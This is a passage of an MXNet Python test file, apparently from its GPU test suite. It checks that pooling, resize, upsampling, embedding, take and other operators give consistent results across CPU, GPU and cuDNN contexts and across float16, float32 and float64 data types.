for data_type in [np.float64, np.float32, np.float16]: # NHWC pooling only enabled on GPU with CUDNN ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}] symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') check_consistency_NxM(symlist, ctx_list) @with_seed() @pytest.mark.serial def test_pooling_versions(): # Produce the name of the 'transposed' layout, given the dimension def transposed_layout(ndim): if ndim < 3 or ndim > 5: raise RuntimeError("Invalid data dim, expecting 3, 4 or 5") return ('NWC', 'NHWC', 'NDHWC')[ndim-3] # default padding is all zeros def is_default_pad(pad): return pad == (0,) * len(pad) # default stride is all ones def is_default_stride(stride): return stride == (1,) * len(stride) # returns True/False randomly with equal probability def random_choice(): return np.random.random(1)[0] < 0.5 def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid', global_pool=False, p_value=2, count_include_pad=True, tol=None, dtype=np.float32): ctx_list = [] sym_list = [] for pool_ctx in pool_op_list: (pool_op, ctx_type) = pool_ctx.rsplit('_', 1) expected_ctxs = ['cpu', 'gpu', 'cudnn'] if ctx_type not in expected_ctxs: raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type)) ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0) ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}}) # start with pool args present in all cases pool_op_args = {'kernel': kernel, 'pool_type': pool_type, 'pooling_convention' : pooling_convention, 'name' : 'pool'} # add other args as needed if global_pool: pool_op_args['global_pool'] = True else: # Add pad and stride param if needed, plus randomly when it matches the default if not is_default_pad(pad) or random_choice(): pool_op_args.update({'pad' : pad}) if not is_default_stride(stride) or random_choice(): pool_op_args.update({'stride' : stride}) expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1'] if pool_op == 'pool_v1': sym = mx.sym.Pooling_v1(**pool_op_args) else: pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad}) if ctx_type != 'cpu': pool_op_args['cudnn_off'] = ctx_type == 'gpu' if pool_op == 'pool': # isolate pooling input from symbol input to test shared tensor optimizations buffered_input = mx.sym.identity(name='pool') sym = mx.sym.Pooling(buffered_input, **pool_op_args) elif pool_op == 'pool_transposed': ndim = len(data) # NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1); axes = (0,) + tuple(range(2,ndim)) + (1,) transposed = mx.sym.transpose(axes=axes, name='pool') pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim), **pool_op_args) # NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3); axes = (0, ndim-1) + tuple(range(1,ndim-1)) sym = mx.sym.transpose(data=pooled, axes=axes, name='pool') else: raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops, pool_op)) sym_list.append(sym) check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol) def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True, tol=None): if dim == '1D': 
data = (3, 3, 10) kernels = [(4,), (4,), (5,)] pads = [(0,), (2,), (2,)] strides = [(1,), (2,), (1,)] elif dim == '2D_no_padding': data = (3, 2, 20, 20) kernels = [(3, 3), (4, 5)] pads = [(0, 0), (0, 0)] strides = [(1, 1), (2, 1)] elif dim == '2D': data = (2, 2, 20, 20) kernels = [(3, 3), (3, 5), (4, 5), (4, 5)] pads = [(0, 0), (1, 2), (0, 0), (2, 3)] strides = [(1, 1), (1, 1), (2, 1), (1, 1)] elif dim == '3D': data = (2, 3, 20, 20, 20) kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)] pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)] strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)] else: raise RuntimeError('Unexpected pooling test class: {}.'.format(dim)) for kernel, pad, stride in zip(kernels, pads, strides): for pooling_convention in ['valid', 'full']: try: test_pooling_versions_helper(pool_op_list=pool_op_list, data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=False, p_value=p_value, count_include_pad=count_include_pad, tol=tol, dtype=dtype) except: print('pool_op_list = {}'.format(pool_op_list)) print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride)) print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type, pooling_convention)) print('p_value={}, count_include_pad={}, dtype={}'.format(p_value, count_include_pad, dtype)) print('environ = \n{}'.format(os.environ)) raise # Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value kernel = kernels[0] if random_choice(): kernel = (300,) * len(kernel) test_pooling_versions_helper(pool_op_list=pool_op_list, data=data, kernel=kernel, pad=None, stride=None, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad, tol=tol, dtype=dtype) # The various implementations of the standard pooling operator std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu', 'pool_gpu', 'pool_transposed_gpu', 'pool_cudnn', 'pool_transposed_cudnn'] # The implementations of the 'v1' pooling operator v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu'] # For those cases when all implementations should match- the combined implementation list. combo_pool_op_list = std_pool_op_list + v1_pool_op_list for dtype in [np.float32, np.float64, np.float16]: # Testing of the standard (not 'v1') pooling operator is universal across all # data dimensions, implementations and layouts. for dim in ['1D', '2D', '3D']: test_pooling_dim(dim, 'max', dtype, std_pool_op_list) test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True) test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False) test_pooling_dim(dim, 'sum', dtype, std_pool_op_list) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3) # Testing of the 'v1' pooling operator is over its restricted support domain of # 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are # always tested against each other, and sometimes against the standard operator versions. # The slightly different 'v1' definition prevents this in the following cases: # # 1. In max pooling, when multiple input values are the maximum in the input window, # the 'v1' implementation backprops the gradient to all maxima, whereas the standard # pooling operator backprops the gradient to the lowest-indexed maximum only. # 2. 
In max pooling, the 'v1' operator pads with 0's and this value can become the # maximum output value in the case of an all-negative input. The standard pooling # operator effectively considers the padding to be the largest negative value, so # only input values should appear in the output. # 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor, # even at the edges, and so does not support count_include_pad = False. # 4. The float16 'v1' pooling operator performs forward sums and averages in # float16, whereas the std operators perform those calculations in float32, so # greater float16 tolerances are needed when comparing across implementations. # Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above. relaxed_tol = {np.dtype(np.float16): 2e-1, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0, np.dtype(np.int64): 0} # Exclude std implementations due to points 1 and 2 above. test_pooling_dim('2D', 'max', dtype, v1_pool_op_list) # The standard and 'v1' implementations match for this case. test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True, tol=relaxed_tol) # Exclude std implementations due to point 3 above. test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False) # The standard and 'v1' implementations match for this case. test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol) # We can compare the standard and 'v1' max pooling implementations if we eliminate padding # (see point 2 above) and use np.float64 data so that no two random input window values are # likely to be the same (see point 1 above). test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list) @with_seed() def test_pooling_full_2d(): def test_pooling_full_2d_type(pool_type): data = (2, 2, 10, 10) kernel = (4, 5) pad = (1, 2) stride = (3, 4) convention = 'full' ctx_list = [] sym_list = [] # o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4 # o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4 ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=convention, global_pool=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=convention, global_pool=False, name='pool')) check_consistency(sym_list, ctx_list) test_pooling_full_2d_type('max') test_pooling_full_2d_type('avg') test_pooling_full_2d_type('sum') @with_seed() @pytest.mark.serial def test_flatten_slice_after_conv(): ctx_list = [] data = mx.sym.Variable('conv_data') conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1)) flatten = mx.symbol.flatten(data=conv) slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1) ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}] check_consistency(slice_sym, ctx_list, scale=0.5) @with_seed() def test_bilinear_resize_op(): ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}] data = mx.sym.Variable('data') sym = mx.sym.contrib.BilinearResize2D(data, 
height=10, width=5, align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False) check_consistency(sym, ctx_list) @with_seed() @pytest.mark.serial def test_global_pooling(): def test_1d_pooling(pool_type, p_value=2): data = (2, 3, 20) kernel = (4,) pad = (2,) stride = (2,) ctx_list = [] sym_list = [] pooling_convention = 'valid' ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) def test_2d_pooling(pool_type, p_value=2): data = (2, 3, 20, 20) kernel = (4, 4) pad = (2, 2) stride = (2, 2) 
ctx_list = [] sym_list = [] pooling_convention = 'valid' if pool_type != 'lp': ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) test_1d_pooling('max') test_1d_pooling('avg') test_1d_pooling('sum') test_1d_pooling('lp', p_value=1) test_1d_pooling('lp', p_value=2) test_1d_pooling('lp', p_value=3) test_2d_pooling('max') test_2d_pooling('avg') test_2d_pooling('sum') test_2d_pooling('lp', p_value=1) test_2d_pooling('lp', p_value=2) test_2d_pooling('lp', p_value=3) 
@with_seed() def test_upsampling_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_upsampling_bilinear_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_concat_with_type(): sym = mx.sym.Concat(name='concat', num_args=2) ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_elementwisesum_with_type(): dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]], [mx.cpu(0), [np.float64, np.float32]] ] for num_args in range(1, 6): ews_arg_shape = {} for i in range(num_args): ews_arg_shape['ews_arg'+str(i)] = (2, 10) sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args) ctx_list = [] for dev, types in dev_types: for dtype in types: ews_arg_dtype = {'type_dict':{}} for i in range(num_args): ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype ctx_elem = {'ctx': dev} ctx_elem.update(ews_arg_shape) ctx_elem.update(ews_arg_dtype) ctx_list.append(ctx_elem) check_consistency(sym, ctx_list) @with_seed() def test_reshape_with_type(): sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0)) ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_blockgrad_with_type(): sym = mx.sym.BlockGrad(name='bg') ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': 
np.float32}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_swapaxis_with_type(): sym = mx.sym.SwapAxis(name='swap', dim1=1) ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_fullyconnected_with_type(): sym = mx.sym.FullyConnected(num_hidden=3, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) # Sizes are divisible by 8 to test TensorCore on Volta GPU. sym = mx.sym.FullyConnected(num_hidden=8, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_activation_with_type(): act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign'] shape = (2, 2, 10, 10) for act_type in act_types: sym = mx.sym.Activation(name='act', act_type=act_type) ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}] check_consistency(sym, ctx_list) @with_seed() def test_lrn(): sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn') ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}, {'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() @pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine', reason="Testing with naive engine consistently triggers illegal memory access. 
Tracked in #17713") def test_embedding_with_type(): def test_embedding_helper(data_types, weight_types, low_pad, high_pad): NVD = [[20, 10, 20], [200, 10, 300], [10000, 4, 20]] for safe_accumulation in ['0', '1', None]: for N, V, D in NVD: with environment('MXNET_SAFE_ACCUMULATION', safe_accumulation): if N > 1000 and safe_accumulation != '1': break sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D) ctx_list = [] for data_type in data_types: for weight_type in weight_types: ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))} check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'}, arg_params=arg_params, scale=0.1) data_types = [np.float16, np.float32, np.float64, np.int32] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 5, 5) data_types = [np.uint8] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 0, 5) @with_seed() def test_take_with_type(): sym = mx.sym.take(name='take') for safe_accumulation in ['0', '1', None]: for data_ndim in range(2, 5): for idx_ndim in range(1, 4): data_shape = () for _ in range(data_ndim): data_shape += (np.random.randint(low=3, high=6), ) idx_shape = () for _ in range(idx_ndim): idx_shape += (np.random.randint(low=3, high=5), ) ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}] arg_params = {'take_indices': np.random.randint(low=0, high=data_shape[0], size=idx_shape), 'take_a': np.random.normal(size=data_shape)} with environment('MXNET_SAFE_ACCUMULATION', safe_accumulation): check_consistency(sym, ctx_list, grad_req={'take_indices': 'null', 'take_a': 'write'}, arg_params=arg_params) # check a large num of indices: may underflow calculating gradient in FP16, # if MXNET_SAFE_ACCUMULATION is not activated with environment('MXNET_SAFE_ACCUMULATION', '1'): data_size = 4 indices_size = 10000 out_dim = 20 data_types = [np.float16, np.float32, np.float64] indices_types = [np.float16, np.float32, np.float64, np.int32] # axis 0 sym = mx.sym.take(name='take', axis=0) ctx_list = [] for data_type in data_types: for index_type in indices_types: ctx_list.append({'ctx': mx.cpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) ctx_list.append({'ctx': mx.gpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': 
data_type}}) arg_params = {'take_indices': np.random.randint(0, data_size, size=(indices_size,)), 'take_a': np.random.normal(size=(data_size, out_dim))} check_consistency(sym, ctx_list, grad_req={'take_indices': 'null','take_a': 'write'}, arg_params=arg_params) # axis 1 sym = mx.sym.take(name='take', axis=1) ctx_list = [] for data_type in data_types: for index_type in indices_types: ctx_list.append({'ctx': mx.cpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) ctx_list.append({'ctx': mx.gpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) arg_params = {'take_indices': np.random.randint(0, data_size, size=(indices_size,)), 'take_a': np.random.normal(size=(data_size, out_dim))} check_consistency(sym, ctx_list, grad_req={'take_indices': 'null','take_a': 'write'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_psroipooling_with_type(): arg_params = { 'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # plain psroipooling sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool') ctx_list = [{'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}}, ] check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write', 'psroipool_rois': 'null'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_deformable_psroipooling_with_type(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3, np.dtype(np.float16): 1e-2} arg_params = { 'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # deformable 